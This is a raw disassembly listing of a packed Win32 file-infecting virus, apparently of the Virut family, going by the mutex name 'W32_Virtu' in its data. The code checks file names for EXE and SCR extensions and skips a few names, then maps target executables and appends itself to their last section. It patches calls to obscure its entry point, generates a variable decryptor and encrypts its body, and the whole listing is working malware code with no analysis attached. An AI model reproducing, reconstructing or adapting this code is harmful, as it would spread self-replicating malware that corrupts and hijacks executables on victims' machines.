mov [ecx-4], eax
mov al, 58h
or al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 400000h
jz short loc_3150AD65
mov ax, 0C350h
or al, [ebp+403429h]
jmp short loc_3150AD6F
; ---------------------------------------------------------------------------
loc_3150AD65: ; CODE XREF: UPX2:3150AD57�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
loc_3150AD6F: ; CODE XREF: UPX2:3150AD63�j
stosw
loc_3150AD71: ; CODE XREF: UPX2:3150AD1C�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_3150ADF0
test dword ptr [ebp+403431h], 20000000h
jz short loc_3150AD96
loc_3150AD89: ; CODE XREF: UPX2:3150AD94�j
test edi, 3
jz short loc_3150AD96
mov al, 90h
stosb
jmp short loc_3150AD89
; ---------------------------------------------------------------------------
loc_3150AD96: ; CODE XREF: UPX2:3150AD87�j
; UPX2:3150AD8F�j
mov ecx, edi
mov eax, [ebp+40399Ah]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+403431h], 800000h
jnz short loc_3150ADBF
lea eax, [ebp+403429h]
loc_3150ADB7: ; CODE XREF: UPX2:3150ADBD�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_3150ADB7
loc_3150ADBF: ; CODE XREF: UPX2:3150ADAF�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_3150ADD4
mov ax, 0C031h
stosw
loc_3150ADD4: ; CODE XREF: UPX2:3150ADCC�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_3150ADED
mov ax, 0C031h
stosw
loc_3150ADED: ; CODE XREF: UPX2:3150ADE5�j
mov al, 0C3h
stosb
loc_3150ADF0: ; CODE XREF: UPX2:3150AD7B�j
lea eax, [ebp+40343Ch]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_3150AE08
push edi
sub edi, eax
pop eax
jmp short loc_3150AE21
; ---------------------------------------------------------------------------
loc_3150AE08: ; CODE XREF: UPX2:3150AE00�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+4039A2h]
add [ebp+403982h], edx
add [ecx], edi
mov eax, [esp+4]
loc_3150AE21: ; CODE XREF: UPX2:3150AE06�j
mov [ebp+40106Dh], edi
mov edi, [ebp+403986h]
sub eax, [ebp+403982h]
test dword ptr [ebp+403431h], 40h
jz short loc_3150AE41
neg eax
loc_3150AE41: ; CODE XREF: UPX2:3150AE3D�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_3150AE45 proc near ; CODE XREF: sub_3150B271+2A8�p
push esi
push edi
cmp dword ptr [ebp+4039AEh], 0
jz loc_3150B02D
call near ptr loc_3150AE65+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_3150AE65: ; CODE XREF: sub_3150AE45+F�p
add bh, bh
sub_3150AE45 endp ; sp-analysis failed
xchg eax, ebp
mov ds:85890040h, dh
mov esi, 53004039h
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_3150A57F
mov edx, [ebp+4039A6h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+4039C2h], eax
add eax, [edx+8]
mov [ebp+4039C6h], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_3150A57F
mov edi, [ebp+4039A6h]
push esi
call sub_3150A57F
mov edx, [ebp+4039A6h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_3150B02D
jz loc_3150B02D
add esi, [ebp+4039AAh]
add esi, [ebp+403972h]
; START OF FUNCTION CHUNK FOR sub_3150AFFE
loc_3150AEDF: ; CODE XREF: sub_3150AFFE+29�j
lodsb
cmp al, 0E8h
jnz loc_3150AF8A
lea eax, [esi+4]
sub eax, [ebp+403972h]
add eax, [esi]
push eax
call sub_3150A57F
cmp dword ptr [ebp+4039A6h], 0
jnz short loc_3150AF0D
cmp eax, [edi+0Ch]
jnb loc_3150B026
jmp short loc_3150AF19
; ---------------------------------------------------------------------------
loc_3150AF0D: ; CODE XREF: sub_3150AFFE-FE�j
cmp [ebp+4039A6h], edx
jnz loc_3150B026
loc_3150AF19: ; CODE XREF: sub_3150AFFE-F3�j
add eax, [ebp+403972h]
cmp word ptr [eax], 25FFh
jnz loc_3150B026
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_3150A57F
cmp [ebp+4039A6h], edi
jnz loc_3150B026
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_3150B026
cmp eax, [edi+8]
jnb loc_3150B026
loc_3150AF62: ; CODE XREF: sub_3150AFFE+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+403972h]
push edx
push eax
push dword ptr [ebp+4039BEh]
call dword ptr [ebp+403548h]
pop edx
test eax, eax
jnz loc_3150B03C
jmp loc_3150B026
; ---------------------------------------------------------------------------
loc_3150AF8A: ; CODE XREF: sub_3150AFFE-11C�j
cmp al, 0FFh
jnz loc_3150B026
cmp byte ptr [esi], 15h
jnz loc_3150B026
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_3150A57F
cmp [ebp+4039A6h], edi
jnz short loc_3150B026
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov [ebp+4039CAh], eax
mov eax, [eax]
cmp eax, [ebp+4039C2h]
jb short loc_3150AFD3
cmp eax, [ebp+4039C6h]
jb short loc_3150B03C
loc_3150AFD3: ; CODE XREF: sub_3150AFFE-35�j
cmp eax, 70000000h
jb short loc_3150B011
call sub_3150AFFE
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+4039CAh]
jnz short locret_3150AFFD
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_3150B018
; ---------------------------------------------------------------------------
locret_3150AFFD: ; CODE XREF: sub_3150AFFE-F�j
retn
; END OF FUNCTION CHUNK FOR sub_3150AFFE
; =============== S U B R O U T I N E =======================================
sub_3150AFFE proc near ; CODE XREF: sub_3150AFFE-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 3150AEDF SIZE 0000011F BYTES
pop dword ptr [ebp+403992h]
pusha
mov esi, [ebp+403972h]
call sub_3150A686
popa
loc_3150B011: ; CODE XREF: sub_3150AFFE-26�j
test eax, 80000000h
jnz short loc_3150B026
loc_3150B018: ; CODE XREF: sub_3150AFFE-3�j
sub eax, [edi+0Ch]
jb short loc_3150B026
cmp eax, [edi+8]
jb loc_3150AF62
loc_3150B026: ; CODE XREF: sub_3150AFFE-F9�j
; sub_3150AFFE-EB�j ...
dec ecx
jnz loc_3150AEDF
loc_3150B02D: ; CODE XREF: sub_3150AE45+9�j
; UPX2:3150AEC7�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+2431h], 7FFFFFFFh
jmp short loc_3150B078
; ---------------------------------------------------------------------------
loc_3150B03C: ; CODE XREF: sub_3150AFFE-7F�j
; sub_3150AFFE-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+4039AEh]
lea edi, [ecx+2435h]
add eax, [ebp+403972h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+52h], 5
mov [esi-4], eax
loc_3150B078: ; CODE XREF: sub_3150AFFE+3C�j
pop edi
pop esi
retn
sub_3150AFFE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3150B07B proc near ; CODE XREF: UPX2:3150B249�p
; sub_3150B271+127�p
lea esi, [ebp+40384Eh]
push esi
call dword ptr [ebp+40357Ch]
cmp eax, 0FFFFFFFFh
jz locret_3150B14C
mov [ebp+403952h], eax
push 0
push esi
call dword ptr [ebp+4035B4h]
test eax, eax
jz locret_3150B14C
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+40355Ch]
cmp eax, 0FFFFFFFFh
jz loc_3150B604
mov [ebp+403956h], eax
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+403584h]
cmp eax, 0FFFFFFFFh
jz loc_3150B5F8
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+403580h]
cmp eax, 0FFFFFFFFh
jz loc_3150B5F8
mov [ebp+40396Ah], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+403956h]
call dword ptr [ebp+403560h]
test eax, eax
jz loc_3150B5F8
xor ecx, ecx
mov [ebp+40396Eh], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+4035A0h]
test eax, eax
jz loc_3150B5D0
mov [ebp+403972h], eax
locret_3150B14C: ; CODE XREF: sub_3150B07B+10�j
; sub_3150B07B+27�j ...
retn
sub_3150B07B endp
; =============== S U B R O U T I N E =======================================
sub_3150B14D proc near ; CODE XREF: sub_3150B271+117�p
; sub_3150B271+223�p
mov eax, 69CDh
mov ecx, [ebx+38h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_3150B167
add eax, [ebp+40106Dh]
loc_3150B167: ; CODE XREF: sub_3150B14D+12�j
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+40397Ah], eax
mov eax, 243Bh
mov ecx, [ebx+3Ch]
add eax, [ebp+40106Dh]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+403976h], eax
retn
sub_3150B14D endp
; =============== S U B R O U T I N E =======================================
sub_3150B192 proc near ; CODE XREF: sub_3150B271:loc_3150B2C0�p
; sub_3150B271+13D�p
movzx ecx, word ptr [ebx+6]
stc
loc_3150B197: ; CODE XREF: sub_3150B192+23�j
jecxz short locret_3150B1CE
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_3150B1CE
cmp dword ptr [edx+0Ch], 1
jb short loc_3150B197
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+40396Ah]
locret_3150B1CE: ; CODE XREF: sub_3150B192:loc_3150B197�j
; sub_3150B192+1D�j ...
retn
sub_3150B192 endp
; =============== S U B R O U T I N E =======================================
sub_3150B1CF proc near ; CODE XREF: UPX2:3150B25B�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_3150B1CF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_3150B1DC: ; CODE XREF: UPX2:3150B1FD�j
mov ecx, edi
jmp short loc_3150B1EB
; ---------------------------------------------------------------------------
lea edi, [ebp+40384Eh]
cld
loc_3150B1E7: ; CODE XREF: UPX2:3150B1F9�j
mov ebx, edi
xor ecx, ecx
loc_3150B1EB: ; CODE XREF: UPX2:3150B1DE�j
; UPX2:3150B201�j
lodsb
cmp al, 61h
jb short loc_3150B1F6
cmp al, 7Ah
ja short loc_3150B1F6
sub al, 20h
loc_3150B1F6: ; CODE XREF: UPX2:3150B1EE�j
; UPX2:3150B1F2�j
stosb
cmp al, 5Ch
jz short loc_3150B1E7
cmp al, 2Eh
jz short loc_3150B1DC
cmp al, 0
jnz short loc_3150B1EB
jecxz short locret_3150B1CE
mov eax, [ecx]
cmp eax, 455845h
jz short loc_3150B219
cmp eax, 524353h
jnz locret_3150B14C
loc_3150B219: ; CODE XREF: UPX2:3150B20C�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_3150B14C
cmp eax, 4E554357h
jz locret_3150B14C
cmp eax, 32334357h
jz locret_3150B14C
cmp eax, 4F545350h
jz locret_3150B14C
xor ebx, ebx
call sub_3150B07B
jz locret_3150B14C
xor edx, edx
call sub_3150B271
call sub_3150B1CF
call $+5
pop ebp
sub ebp, 402F8Ah
jmp loc_3150B5AE
; =============== S U B R O U T I N E =======================================
sub_3150B271 proc near ; CODE XREF: UPX2:3150B256�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+403972h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_3150B5AE
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_3150B5AE
test dword ptr [ebx+16h], 2000h
jnz loc_3150B5AE
test byte ptr [ebx+5Ch], 2
mov ecx, [esi+20h]
jz loc_3150B5AE
jecxz short loc_3150B2C0
cmp ecx, 101h
jbe loc_3150B5AE
loc_3150B2C0: ; CODE XREF: sub_3150B271+41�j
call sub_3150B192
jb loc_3150B5AE
mov ecx, [edx+10h]
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call sub_31509DCA
xor [ebp+40342Fh], dl
mov cl, 20h
xor [ebp+403430h], dh
loc_3150B2EA: ; CODE XREF: sub_3150B271+92�j
push 20h
dec cl
pop eax
js short loc_3150B305
call sub_31509DCA
test edx, edx
setz dl
shl edx, cl
xor [ebp+403431h], edx
jmp short loc_3150B2EA
; ---------------------------------------------------------------------------
loc_3150B305: ; CODE XREF: sub_3150B271+7E�j
; sub_3150B271+CD�j ...
push 6
pop ecx
loc_3150B30B: ; CODE XREF: sub_3150B271+B8�j
push 6
pop eax
call sub_31509DCA
mov al, [ebp+403429h]
xchg al, [edx+ebp+403429h]
mov [ebp+403429h], al
loop loc_3150B30B
test dword ptr [ebp+403431h], 8
jnz short loc_3150B340
cmp byte ptr [ebp+40342Bh], 1
jz short loc_3150B305
loc_3150B340: ; CODE XREF: sub_3150B271+C4�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_3150B367
cmp byte ptr [ebp+403429h], 5
jz short loc_3150B305
cmp byte ptr [ebp+40342Ah], 5
jz short loc_3150B305
cmp byte ptr [ebp+40342Bh], 5
jz short loc_3150B305
loc_3150B367: ; CODE XREF: sub_3150B271+D9�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_3150B37C
cmp byte ptr [ebp+403429h], 2
ja short loc_3150B305
loc_3150B37C: ; CODE XREF: sub_3150B271+100�j
and dword ptr [ebp+4039AEh], 0
call loc_3150A817
call sub_3150B14D
call sub_3150B5B7
mov ebx, [ebp+403976h]
call sub_3150B07B
jz loc_3150B5AE
mov esi, [ebp+403972h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_3150B192
jb loc_3150B5AE
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_3150B3E4
lea esi, [ebp+40343Ch]
mov ecx, [ebp+40106Dh]
rep movsb
loc_3150B3E4: ; CODE XREF: sub_3150B271+163�j
push edi
mov ecx, 90Fh
lea esi, [ebp+401000h]
rep movsd
mov cl, 0
jecxz short loc_3150B3F8
rep movsb
loc_3150B3F8: ; CODE XREF: sub_3150B271+183�j
test dword ptr [ebp+403431h], 10000000h
jz loc_3150B4B0
push dword ptr [ebx+28h]
call sub_3150A57F
mov edx, [ebp+4039A6h]
test edx, edx
jz loc_3150B4B0
mov esi, [ebp+403972h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_3150B435
xor ecx, ecx
loc_3150B435: ; CODE XREF: sub_3150B271+1C0�j
add esi, [edx+14h]
cmp ecx, [ebp+40106Dh]
mov ecx, [ebp+40106Dh]
jb short loc_3150B49C
mov edi, [esp+14h+var_14]
and dword ptr [ebp+40106Dh], 0
and dword ptr [edi+6Dh], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+403986h]
test dword ptr [ebp+403431h], 40h
jz short loc_3150B475
neg dword ptr [eax]
loc_3150B475: ; CODE XREF: sub_3150B271+200�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+4039AEh], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+403431h], 40h
jz short loc_3150B493
neg dword ptr [eax]
loc_3150B493: ; CODE XREF: sub_3150B271+21E�j
push ecx
call sub_3150B14D
pop ecx
jmp short loc_3150B4A8
; ---------------------------------------------------------------------------
loc_3150B49C: ; CODE XREF: sub_3150B271+1D3�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_3150B4A8: ; CODE XREF: sub_3150B271+229�j
lea esi, [ebp+40343Ch]
rep movsb
loc_3150B4B0: ; CODE XREF: sub_3150B271+191�j
; sub_3150B271+1A7�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+1D2h]
cmp dl, [ebp+40342Fh]
jnz short loc_3150B4C9
imul edx, 12345678h
loc_3150B4C9: ; CODE XREF: sub_3150B271+250�j
mov [eax-1], dl
call sub_3150949D
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
lea eax, [ecx+6]
jnz short loc_3150B4FA
mov [ebp+4039AEh], ecx
add eax, [ebp+40106Dh]
and dword ptr [edi+6Dh], 0
loc_3150B4FA: ; CODE XREF: sub_3150B271+274�j
sub eax, [ebx+28h]
push dword ptr [ebp+40397Eh]
mov [edi+52h], eax
pop dword ptr [esi+20h]
test dword ptr [ebp+403431h], 80000000h
jz short loc_3150B51F
push edx
call sub_3150AE45
pop edx
loc_3150B51F: ; CODE XREF: sub_3150B271+2A5�j
mov ecx, [ebp+4039AEh]
jecxz short loc_3150B52A
mov [ebx+28h], ecx
loc_3150B52A: ; CODE XREF: sub_3150B271+2B4�j
mov ecx, [edx+10h]
mov eax, [ebp+403976h]
cmp [edx+8], ecx
jnb short loc_3150B53B
mov [edx+8], ecx
loc_3150B53B: ; CODE XREF: sub_3150B271+2C5�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+40397Ah]
push 243Ch
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+40342Fh]
test dword ptr [ebp+403431h], 10000000h
jz short loc_3150B56C
add ecx, [ebp+40106Dh]
loc_3150B56C: ; CODE XREF: sub_3150B271+2F3�j
mov dh, 0
test dword ptr [ebp+403431h], 20000h
jnz short loc_3150B58E
inc dh
test dword ptr [ebp+403431h], 40000h
jnz short loc_3150B58E
mov dh, [ebp+403430h]
loc_3150B58E: ; CODE XREF: sub_3150B271+307�j
; sub_3150B271+315�j
test dword ptr [ebp+403431h], 4000h
jnz short loc_3150B5A5
loc_3150B59A: ; CODE XREF: sub_3150B271+330�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_3150B59A
jmp short loc_3150B5AE
; ---------------------------------------------------------------------------
loc_3150B5A5: ; CODE XREF: sub_3150B271+327�j
; sub_3150B271+33B�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_3150B5A5
loc_3150B5AE: ; CODE XREF: UPX2:3150B26C�j
; sub_3150B271+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_3150B271 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3150B5B7 proc near ; CODE XREF: sub_3150B271+11C�p
cmp dword ptr [ebp+403956h], 0
jz locret_3150B14C
push dword ptr [ebp+403972h]
call dword ptr [ebp+4035C4h]
loc_3150B5D0: ; CODE XREF: sub_3150B07B+C5�j
push dword ptr [ebp+40396Eh]
call dword ptr [ebp+40353Ch]
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+4035B8h]
loc_3150B5F8: ; CODE XREF: sub_3150B07B+6B�j
; sub_3150B07B+82�j ...
push dword ptr [ebp+403956h]
call dword ptr [ebp+40353Ch]
loc_3150B604: ; CODE XREF: sub_3150B07B+45�j
lea esi, [ebp+40384Eh]
push dword ptr [ebp+403952h]
push esi
call dword ptr [ebp+4035B4h]
and dword ptr [ebp+403956h], 0
retn
sub_3150B5B7 endp
; ---------------------------------------------------------------------------
db 0E8h
dd 0
dd 81016A5Dh, 403349EDh, 0FF05800h, 158085C1h, 0C0850040h
dd 0FFC883C3h, 85C10FF0h, 401580h, 103DC3h, 1C75002Ah
dd 247C8166h, 75716C0Ch, 0C4E86013h, 75FFFFFFh, 0FB7EE805h
dd 0D2E8FFFFh, 61FFFFFFh, 782DFF2Eh, 0B8123456h, 25h, 0FFA5E860h
dd 3975FFFFh, 3024448Bh, 384EB58Dh, 508B0040h, 3A816608h
dd 25730206h, 6856h, 0C48B00FFh, 5052006Ah, 35F895FFh
dd 0C4830040h, 5C3E8108h, 755C3F3Fh, 4C68303h, 0FFFB2BE8h
dd 0FF7FE8FFh, 0C361FFFFh, 74B8h, 0B8B1EB00h, 2Fh, 10E8h
dd 20C200h, 30B8h, 3E800h, 24C20000h, 24548D00h, 832ECD0Ch
dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 13ED811Ah
dd 0E8004034h, 0FFFFE539h, 4C261h, 2010307h, 468F0605h
dd 4174C928h, 119415FFh, 900100h, 3Fh dup(0)
dd 63000000h, 0DE77E779h, 7D77E737h, 0FD77F515h, 77E7A5h
dd 2 dup(0)
dd 72000000h, 3777E746h, 9777E7A8h, 0B877E777h, 8377E61Bh
dd 3777E7AAh, 0E777E7ACh, 4977EBB1h, 2477E73Ch, 0AB77E794h
dd 0EF77E74Ch, 0E277E793h, 9377E73Ch, 8F77E79Fh, 3477E6AFh
dd 8677E6ADh, 5777E7C4h, 0D877E7C6h, 7677E805h, 1577E74Dh
dd 0B777E7C8h, 9577E706h, 0E977EBA5h, 9677EBA6h, 1A77E703h
dd 0E677E701h, 4C77E61Bh, 9077E77Ch, 0A77E750h, 8C77E798h
dd 6377E79Dh, 377F7E4h, 0A377F7E6h, 0B377F7E6h, 0D377F7E6h
dd 7377F7E6h, 0F377F7EAh, 6377F7EAh, 4377F7EBh, 377F7ECh
dd 3377F7F5h, 77F526h, 15h dup(0)
dd 380036h, 3150B934h, 42005Ch, 730061h, 4E0065h, 6D0061h
dd 640065h, 62004Fh, 65006Ah, 740063h, 5C0073h, 330057h
dd 5F0032h, 690056h, 740072h, 75h, 0BBh dup(0)
dd 6100h, 18E9h dup(0)
UPX2 ends
; Section 4. (virtual address 00012000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00012000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 31512000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start